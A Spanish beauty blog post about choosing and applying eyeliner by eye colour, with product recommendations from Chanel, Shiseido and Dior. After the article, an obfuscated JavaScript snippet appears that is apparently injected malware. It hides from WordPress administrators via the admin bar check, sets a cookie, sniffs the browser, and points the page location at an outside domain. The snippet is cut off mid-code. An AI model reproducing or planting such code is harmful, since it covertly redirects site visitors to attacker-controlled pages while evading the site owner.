Hay ojos que deslumbran y miradas que hipnotizan. Siempre me han llamado la atención las mujeres que saben potenciar bien sus ojos, independientemente del color, tamaño y forma que estos tengan. Chicas que conocen la belleza que hay tras una bonita mirada y saben intensificarla bien usando el eyeliner correcto. Hace unos años, todas usábamos el negro fueran como fueran nuestros ojos. Sin embargo, hoy en día hay una gama tan amplia como sorprendente de este producto: los hay de color malva, verde, dorado… y hasta blanco. Cada uno para un tono de ojos diferente: miel, negros o marrón avellana, etc. No importa cómo sean tus ojos, hoy te vamos a contar cómo resaltarlos con el eyeliner adecuado.

como-aplicar-el-eyeliner

Tipos de eyeliner

 Los más comunes son dos: en formato crema y en formato rotulador. El primero puede aplicarse con un pincel y gracias a su textura fluida, se consigue un trazo muy preciso, grueso o fino según desees. En esta línea, te recomendamos Calligraphie de Channel, que además tiene larga duración y un color black intenso que te permitirá enamorar a quien desees. El segundo tipo de eyeliner, el que se aplica con un rotulador es aún más fácil de usar porque la mayoría suele tener un pincel ergonómico que permite darle la forma y trazo a la línea, tal y como queramos. Por ejemplo, el Archliner Ink de Shiseido tiene esta cualidad y además ofrece un acabado satinado y una duración de 24 horas. Una de sus grandes ventajas es que está hecho a prueba de errores, es decir que es imposible que la raya te salga mal gracias a su pincel ergonómico.
eyeliner-ideal

Si estás buscando un maquillaje natural, lo ideal es que hagas un trazo fino en la base de las pestañas superiores desde dentro hacia fuera, pero si quieres intensificar la mirada y darle un toque más sensual, en la parte exterior del ojo, levanta un poco el trazo.

Qué mirada deseas tener

Probablemente sepas que hay eyeliner de muchos colores, pero ¿estás segura de saber cuál es el que más va con tu tono de ojos?  ¡Toma nota porque te sorprenderá!

Si tienes los ojos de color verde, puedes aplicar un tono de eyeliner en marrón avellana, en beige o morado, pero nunca en verde. De hecho, una tonalidad que quedaría de lujo en tu mirada es el Diorshow on Stage Liner de Dior en morado, un rotulador con punta ultraflexible que se adapta a cualquier párpado y permite el trazo perfecto y deseado.

tipos-de-eyeliner

Te recomendaríamos el color mate pop blue de la misma colección, si quieres resaltar tus ojos y estos son marrones. En realidad, para ti, también sería perfecto el eyeliner morado, beige o dorado. Lo que sí te desaconsejamos es que optes por un tono marrón, ya que apagará tu mirada, consiguiendo el efecto contrario al deseado.

Los ojos color miel reclaman un eyeliner marrón para lucir un tono más oscuro y verde para hacer la mirada más dulce. El Diorshow on stage liner de Dior en color matte pop green le aportará a tu mirada ese toque natural a la vez que cálido que estás buscando. Ideal para el día y la noche.

¿Qué eyeliner te gusta usar y por qué?

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone